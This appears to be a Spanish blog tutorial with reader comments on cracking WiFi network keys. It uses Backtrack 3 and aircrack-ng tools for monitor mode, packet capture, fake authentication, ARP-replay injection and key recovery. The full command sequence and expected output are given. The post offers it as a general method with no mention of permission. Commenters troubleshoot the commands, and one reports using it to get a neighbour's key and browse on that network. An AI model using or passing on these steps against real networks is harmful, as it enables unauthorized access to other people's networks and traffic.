Hoy vamos a aprender a desencriptar las contraseñas de los puntos de red wifi protegidos, usaremos una distro de GNU/Linux llamada Bactrack 3 y una computadora portatil.
Sugiero que prueben esta guía en su maquina y cuenten como les funciono…
*Update*
Aquí pueden ver una lista de compatibilidad de Laptops
Y aquí una de Tarjetas Wireless
Que es lo que necesitamos?
Para que se nos haga mas fácil, vamos a usar Backtrack 3 versión USB, la podemos encontrar aquí, Backtrack 3.
Al descomprimirlo, vamos a ver dos folders, los copiamos al root de nuestra memoria usb (ej. E:/) luego lanzamos el command prompt (Inicio / ejecutar / cmd) dentro de la terminal navegamos hasta nuestra memoria usb, en este caso tecleamos e: y le damos enter.
Tecleamos cd boot para ir a este folder dentro de nuestra memoria, estando ahi adentro tecleamos bootinst.bat seguimos las instrucciones y luego de esto ya podemos arrancar con nuestra distro de bactrack.
Ahora al reiniciar la computadora, presionamos el boton para seleccionar de donde arrancar (Varia con cada computadora, lee el manual de usuario) y seleccionamos la memoria usb.
Ya dentro del sistema operativo, se darán cuenta (Para los que no han usado linux) de que es similar a Windows.
Vamos con la parte principal.
Para abrir una presionamos el cuadrado negro que esta al lado del “menu de inicio”.
En una terminal ponemos:
airmon-ng start wifi0 (Ojo, es un cero no una “O”)
Después de esto ponemos:
airodump-ng eth1
Cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribimos:
airodump-ng -c [channel] –bssid [AP MAC] -w [filename] eth1
donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, muy importante no olvidar esto.
Después de esto, abrimos una nueva terminal y escribimos lo siguiente
aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] eth1
donde:
[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.
Si nos sale lo siguiente, vamos muy bien:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful
Si no, probaremos con este comando:
Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] eth1
(Si usamos esta segunda opcion, el siguiente paso lo haremos en una terminal nueva)
Y deberíamos de obtener algo asi:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
Si no nos funciona, no podremos seguir trabajando con esa red, repasa los pasos, algo hiciste mal.
Ya vamos dentro, empezamos con la etapa de inyección.
En la terminal escribimos
aireplay-ng -3 -b [AP MAC] eth1 -x 250
Esto va a tomar un rato, veras como la columna de numeros empieza a moverse.
Espera hata tener unos 40.000 más o menos (o puedes esperar unos 5 minutos) y abre una tercera terminal.
aircrack-ng -z -b [AP MAC] [filename*.cap]
En filename ponemos el nombre del archivo que usamos antes, en este caso seria casa.cap
En unos momentos aparecerá la clave, la apuntamos en un papel, reiniciamos con nuestro sistema preferido y ya tenemos acceso a la red…
Saludos.
alguien ya probo con alguna Netbook? especificamente con una Msi Wind U100 ?
no tengo buena señal como para bajar el programa….
Ahora bajaré y probaré con Backtrack 4.
Sobre este mensaje de error al ejecutar el último comando (“Got no data packets from target network!”)
qué me dices?
Gracias por las contestaciones
lo probe con mi Inspiron 1420 pero en la vercion livecd pero no me reconoce la wifi haber si alguien me ayuda
Alguien sabe de alguna distro que reconozca la wifi del Dell mini 9 (chipset broadcom)? Con backtrack 4 tampoco la reconoce…
igual tengo un dell inspiron 1525 tampoco me reconoce la tarjeta porfa k alguien me ayude gracias ….
Alguna sugerencia sobre el Dell mini 9?
Pues a mi con mi portatil Acer Aspire 9400 la targeta wifi la reconoce perfectamente pero para activarla tuve que poner en una terminal:
/etc/init.d/NetworkManager start
lo copias tal cual y das enter
Bueno, dependera de la interfaz en la que este la tarjeta wifi..
Probar con: iwconfig
Con el dell mini 9 no me reconoce la tarjeta de red inalambrica directamente en ninguna interfaz…ni con ifconfig ni con iwconfig…
no me rula
excelente Bactrack 3 en 5 menostos crakeado una wpa
Alguien me puede decir cual es el [AP SSID] todo me va saliendo bien hasta que llego a ese comando.
SSID Es el nombre de la red, ahi pones el nombre de la red a la que te quieres conectar.
Que bien Gracias…
el bvack track funka con window xp?? tengo xp instalado funka pero tengo tarjeta y antena inalambrica funka en xp?
ola estaba todo muy hasta k me encontre ese problema cuando pongo –>aireplay-ng -fakeauth 0 -e WLAN503811 -a 00:22:2D:05:05:03:8A rausb0
me sale esto–>Invalid fromds filter. [0,1]
“aireplay-ng –help” for help.
y de ai se keda y no sale lo k me tiene k salir k es lo k tu dices
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful
no me sale esto xfavor ayudame
esto funcionara sobre mi PC 386sx con 2 megas de memoria ram??
alex, te marca error porque estas utilizando solo un guion mendio antes del fakeauth y es doble guion medio– o sustituye la parte de –fakeauth por -1
Holas tengo una mininote hp intela atom n270, kisiera sabes si puedo usar el backtrack3 lo he instalado en una usb, y todo la cosa esta si no habra problemas en la compatibilidad, y en todo caso ke tipo d driver podria usar, x ke he buskado en paginas pero no he encontrado nada, plz enviar un email a reef_globe@hotmail.com
mucha sera que funciona con una tarjeta wifi usb?
hola..yo tengo un acer aspire 5920 y cuando pongo bootinst.bat me dice “You`re starting Slax installer from a read-only media , this will not work” porque? porfa me ayuda alquien?
alguen sabe si funciona con una toshiba satellite con tarjeta de red atheros ????????
alguien ke diga si le funciono?
despues del comando :
airodump-ng -c [channel] –bssid [AP MAC] -w [filename] eth1
Decis, “despues de esto,,,,,,” , no se si es normal que tarde mucho y que solo los Beacons se increamenten todo el tiempo….
Gracias!
Perfecto. Con un Dell Vostro 1510. Descargado el backTrack 4 y quemado en un dvd, arranque desde este. Luego startx y tube que conectar una tarjeta de red WIFI USB conceptronic, ya que la del portatil no la reconocio. Una vez hecho esto y siguiendo todos los pasos, en cerca de una hora, la segunda vez, consegui la clave de mi vecino y navegando.
Recomiendo hacer cada proceso en un terminal nuevo, excepto lso que finalicen, es decir, no finalizar ninguno, para generar más trafico en la red
Holas tengo una mininote hp intel atom n270, corri el backtrack 3 desde mi USB, pero corre todo bien y al final cuando pongo startx me sale el error algo como ke tu tarjeta de video no soporta, y bueno ya ke no pude hacer nada graficamente, lo estoy haciendo todo con comandos, pero el problema tbn ke tengo es ke al poner iwconfig, no me sale ninguna descripcion de mi tarjeta ni nada, y bueno mucho menos me corre airdump, airmong, kiziera saber si alguien me puede indicar alguna ayuda…
email a reef_globe@hotmail.com